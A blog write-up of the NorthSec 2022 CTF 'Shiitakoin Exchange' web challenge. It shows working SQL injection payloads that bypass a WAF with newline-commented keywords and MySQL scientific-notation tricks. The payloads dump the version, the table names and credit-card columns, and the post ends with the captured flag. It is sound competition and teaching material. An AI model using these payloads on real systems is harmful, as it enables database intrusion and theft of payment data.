NorthSec 2022 CTF Shiitakoin Exchange Solution

Its no secret I love the NorthSec CTF. I think its hands down the best all-around CTF out there. For the second time in a row my team and I (PAUMD) placed first in the CTF. In doing so we solved a lot of really cool challenges. Overall I really enjoyed the challenged made by Marc Olivier Bergeron (mbergeron) he's a great challenge designer and his template injection track (parts 2 and 3) left me seriously stumped.

The main takeaway form this challenge is that scientific notation with integer inputs can lead to a lot of weird stuff. Funny enough, I've personally seen this type of vulnerability in browser bases games (PHP) and online casinos when sending money to other, but never in DBs.  

In total 8 teams managed to solve this challenge during the CTF and unfortunately all solvers found a bypass one way or another.

alt

The solution that PAUMD found was also an unintended solution, so a complete bypass to the intended way of solving the challenge. The challenge at its core was centred around a very unusual and hard to identify bug in MySQL regarding scientific notation which would allows for SQL injections to be performed through certain WAFs.

There is a good in-depth detailed blog written by the author of the challenge here.

alt

Cool, so the CFO wants us to take a look at the web application containing "confidential financial information" and he's confident we wont find anything because of their WAF.  The application looks like the following.

alt

It's important to remember that most WAF's filter key words like union, select, and so on. In poor WAFs we can bypass this filter by using inline comments most or more complex approach like adding SQL keywords that will further separate the two words. However, in this challenge it was discovered fairly early on that the WAF blocked select but not !select.

The only problem here is that !select is not valid Ess-cue-ell. However, if you essentially "comment out" the ! with %0A (a newline) select will properly evaluate.

union -- !
SELECT

This is simply because SQL can be broken onto multiple lines this allows us to perform proper queries effectively bypasses the WAF and the intended way of solving this challenge.

' and 2=1 union -- !
SELECT 1,@@version,3,4,5,6 #
alt

Now that we've got the version the next logical step is to get the information_schema table. This typically should provide us with the databases table names and different datatypes of columns, etc,.

' and 2=1 union -- !
SELECT 1,table_name,3,4,5,6 from `information_schema`-- a
.`tables` # 
altalt

There are a lot of interesting tables here but what should really catch your eyes is the payments_7d1a43de and transactions_c1a64cc6 tables. It's funny actually. For those of you who don't know the CTF has a lore and in looking at the transactions table we will actually figure out that the CFO is defrauding the company. However for the purposes of getting flags we'll want to look at the payments table.

' and 2=1 union -- !
SELECT 1,id,credit_card_number,4,5,6 from payments_7d1a43de#
altalt

TADA just like that we've got the flag.

askgod submit FLAG-46e5d6e00d31664f42f0d2290c473143
Congratulations, you score your team 3 points!

Intended solution is a in fact the a scientific notation bug. The intended payloads were intended to be:

' and id = 0 union 1.e(select table_name,1,column_name,1,1,1 from information_schema 1.e.columns)#

alt
’ and id = 0 union 1.e(select credit_card_number,1,1,1,1,1 from payments_7d1a43de)#
alt

This might be the only challenge I’ll write up unfortunately. I wasn’t able to solve all three parts of the template injection challenge that I really liked & did an overall poor job documenting other challenges. Anyways, thank you for reading! Hope to see you all on-site at NorthSec 2023 =:)

Article Link: NorthSec 2022 CTF Shiitakoin Exchange Solution